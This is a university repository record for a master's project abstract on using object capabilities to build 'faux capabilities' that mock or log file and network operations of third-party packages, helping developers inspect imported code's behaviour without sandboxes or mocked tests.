Tanay Godse

Publication Date

Spring 2025

Degree Type

Master's Project

Degree Name

Master of Science in Computer Science (MSCS)

Department

Computer Science

First Advisor

Thomas H. Austin

Second Advisor

Katerina Potika

Third Advisor

Fabio Di Troia

Keywords

Programming language design, cybersecurity, user experience, testing, sandboxing

Abstract

When using third-party packages or libraries, it is crucial to understand their behavior. Typically, this requires developers to either conduct code reviews or set up sandbox environments for testing or write unit tests with mocked values for every function used in their code. However, these approaches are often inefficient and time-consuming. A more effective solution would provide developers with a broad understanding of the functionality required by the code they plan to import. This can be done using object capabilities, where a particular functionality is the capability that an object must possess, in order to be able to perform the required actions. Examples of these functionalities of capabilities could be something like File I/O, Network access etc. This research explores using the object-capabilities system to create faux capabilities. The faux capabilities possess the same methods and attributes as the original capabilities, however the way they behave is different. These capabilities can either mock results for the operations used by the third-party code or log those operations to a defined log file, helping developers gain insight into the code’s behavior without having to set up a sandbox environment or creating mocked unit tests.

Download

Share

COinS